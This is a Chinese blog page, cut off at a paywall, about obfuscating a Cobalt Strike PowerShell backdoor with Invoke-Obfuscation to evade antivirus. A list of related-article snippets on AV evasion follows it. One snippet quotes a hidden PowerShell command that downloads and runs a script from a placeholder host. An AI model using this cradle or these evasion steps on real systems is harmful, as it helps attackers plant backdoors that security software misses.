利用Invoke-Obfuscation混淆ps文件实现上线/VT免杀率3/55

最新推荐文章于 2024-08-07 09:03:12 发布
最新推荐文章于 2024-08-07 09:03:12 发布
阅读量9.6k 收藏 1
点赞数
分类专栏: 文章 文章标签: 安全 测试工具 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AerYinan/article/details/122447756
版权
本文介绍了如何利用Invoke-Obfuscation工具对PowerShell(PS)脚本进行混淆,以实现上线并提高在VirusTotal上的免杀率。首先,通过Cobaltstrike创建PS1后门文件,接着在Invoke-Obfuscation中选择相应的混淆包和生成器。当遇到Win10 x64系统中Import-Module的加载问题时,可以通过修改执行策略为Unrestricted来解决。混淆后的PS1文件通过编码方式选择和输出文件名的指定完成混淆过程。最后,运行混淆后的脚本,后门即可上线。同时,文章提到了VirusTotal的检测结果,并强调未加处理的PS后门可能绕过杀软,建议安全意识较低的用户考虑卸载PowerShell。
摘要由CSDN通过智能技术生成

                                                   远赴人间今鸿雁。一睹人间盛世言。

利用Invoke-Obfuscation混淆ps文件实现上线/VT免杀率3/55

提示:
powershell只能针对win7之后的系统,之前的win操作系统默认没有安装powershell。

1.Cobaltstrike制作ps1后门文件
2.进入Invoke-Obfuscation

Cobaltstrike制作ps1后门文件

Attacks -> packages-> payload genweator

在这里插入图片描述

在这里插入图片描述

进入Invoke-Obfuscation
代码如下(示例):

进入powershell
Import
最低0.47元/天 解锁文章
Are一楠
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
E: Problem executing scripts APT::Update::Post-Invoke-Success 'if /usr/bin/test -w /var/cache/app-in
weixin_45565155的博客
02-08 7392
Ubuntu 16.04 出现 E: Problem executing scripts APT::Update::Post-Invoke-Success 'if /usr/bin/test -w /var/cache/app-info -a -e /usr/bin/appstreamcli; then appstreamcli refresh > /dev/null; fi’ 查找了一下解...
【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】
AA8j的博客
07-06 2050
0x01 项目地址 https://github.com/danielbohannon/Invoke-Obfuscation 0x02 用法 生成powershell: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))" 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscati
Invoke-Obfuscation(psh代码混淆)
不知名白帽的博客
08-11 818
Invoke-Obfuscation(psh代码混淆)
Invoke-Obfuscation:一款功能强大的PowerShell代码混淆工具
2401_84466223的博客
06-22 592
Invoke-Obfuscation是一款功能强大的PowerShell代码混淆工具,该工具兼容PowerShell v2.0+,能够帮助广大研究人员对PowerShell命令和脚本代码进行混淆处理。
invoke-obfuscation使用遇到的问题及Encoding免杀
Croil的博客
12-25 2049
简单的invoke-obfuscation使用
Invoke-Obfuscation混淆免杀过360和火绒
crowsec
06-01 2102
微信公众号:乌鸦安全 扫取二维码获取 目录 1. 模块使用 2. msfvenom下msf上线 2.1 360 2.2 Windows defender 2.3 火绒 2.4 总结 3. 混淆大法 4. 第一种混淆 1 4.1 360 4.2 windows Defender 4.3 火绒 4.4 总结 5. 第2种混淆 2 5.1 火绒 5.2 360 5.3 Windows Defender 5.4 总结 6. 第三种方法 3 6.1 360 6.2 火.
Invoke-Obfuscation笔记
mingyqf的博客
05-11 1378
坑点:window11不行,放到虚拟机win10 就行了 步骤: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation
Invoke-Obfuscation混淆ps文件绕过Windows_Defender
tempulcc的博客
09-10 670
前提# powershell只能针对win7之后的系统,之前的win操作系统默认没有安装powershell。 所在目录:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 混淆# 1.Cobaltstrike制作ps1后门文件 2.进入Invoke-Obfuscation Copy Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 可能会报错?! win10 x64系统 I
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
本文探讨的技术涉及两个关键工具:Invoke-Obfuscation-Bypass 和 PS2EXE,它们是针对PowerShell脚本进行混淆和转换为可执行文件(exe)的方法,以规避主流杀毒软件的检测。 Invoke-Obfuscation 是一个 PowerShell ...
Linux 系统sudo apt-get update出错E: Problem executing scripts APT::Update::Post-Invoke-Success
少安的砖厂
12-29 2138
Ubuntu系统运行 sudo apt-get update时报错如下: E: Problem executing scripts APT::Update::Post-Invoke-Success 'if /usr/bin/test -w /var/cache/app-info -a -e /usr/bin/appstreamcli; then appstreamcli refresh > /d
Ubuntu16.04 32位机更新软件源出现错误:E:Problem executing scripts APT::Update::Post-Invoke-Success 'if .......
Bingolin_G的博客
08-11 2701
  开发环境:     我使用的环境是:VM14pro+Ubuntu16.04的32位机  出现问题:E:Problem executing scripts APT::Update::Post-Invoke-Success 'if /usr/bin/test -w /var/cache/app-info -a -e /usr/bin/appstreamcli; then appstreamc...
阿里云PowerShell去混淆工具(Aliyun-PSDeObfuscator)
最新发布
gitblog_00307的博客
08-07 292
阿里云PowerShell去混淆工具(Aliyun-PSDeObfuscator) aliyun-psdeobfuscator项目地址:https://gitcode.com/gh_mirrors/al/aliyun-psdeobfuscator 一、项目介绍 阿里云PowerShell去混淆工具(Aliyun-PSDeObfuscator)是一款专门用于解析和还原被混淆的PowerShell脚...
〖教程〗Ladon免杀/.NET免杀/Exe2Ps1/Ps12Exe
K8哥哥
07-16 924
背景 有很多人和我说exe被杀了怎么办?我问大家一句mimikaz被杀了你怎么办,是不是用它的PowerShell版或者转成其它格式来免,当然也可以直接修改源码免,但由于是公开的里面很多函数都被杀软盯得很死,加上很多人根本不是很懂代码,对一个公开并且很受欢迎的工具做源码免杀也是很花时间的。所以网上有不少免杀MZ的方法,EXE不能用时大家也会去用PowerShell版远程加载读取等,怎么到Ladon这你们就不知道怎么办了呢?不是一样的原理吗?难道是因为PS版体积较大?有些PY或GO写的工具先不说一般最小就2-
近源渗透学习
tomyyyyy
05-07 1466
一、近源渗透 近源渗透测试是网络空间安全领域逐渐兴起的一种新的安全评估手段。 它是一种集常规网络攻防、物理接近、社会工程学及无线电通信攻防等能力于一体的高规格网络安全评估行动。网络安全评估小组在签订渗透测试授权协议后,通过乔装、社工等方式实地物理侵入企业办公区域,通过其内部各种潜在攻击面(如Wi-Fi网络、RFID门禁、暴露的有线网口、USB接口等)获得“战果”,最后以隐秘的方式将评估结果带出上...
PowerShell木马免杀利器: Invoke-Obfuscation(过火绒)
xf555er的博客
01-07 2321
Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-ObfuscationInvoke-Obfuscation是一款PowerShell混淆工具,可以将PowerShell脚本加密,使得它的检测和分析变得更加困难。该工具包含多种加密方法,可以单独使用也可以结合使用,以提高混淆的效果。
混淆的JavaScript脚本如何调试
04-02 1053
PS脚本在执行后会删除自身,因此在$MFT中看不到它,与文件删除一样,$MFT中的EntryNumber被标记为未分配,并且很快被覆盖,但还有另一个名为$UsnJrnl的表(记录系统上发生的所有更改;它将尝试从第一个URL下载“01b1v2g3.zip”(另存为“s3pch1.zip”,解压内容到创建的“MsEdgeSandbox”隐藏文件夹中,并删除“s3pch1.zip”),或者从第二个URL下载(下载“f1lePsa”变量中指定的文件,并将它们保存在同一“MsEdgeSandbox”目录中)。
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1705
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 761
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
如何下载Invoke-Obfuscation
04-06
1. 打开GitHub页面:https://github.com/danielbohannon/Invoke-Obfuscation 2. 点击“Clone or download”按钮,选择“Download ZIP”选项,将压缩包下载到本地。 3. 解压缩下载的压缩包。 4. 在解压缩后的文件夹中找到“Invoke-Obfuscation.psd1”文件,右键点击该文件,选择“以管理员身份运行PowerShell”。 5. 在PowerShell窗口中输入“Import-Module .\Invoke-Obfuscation.psd1”,按回车键进行加载。 6. 下载完成,可以开始使用Invoke-Obfuscation
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值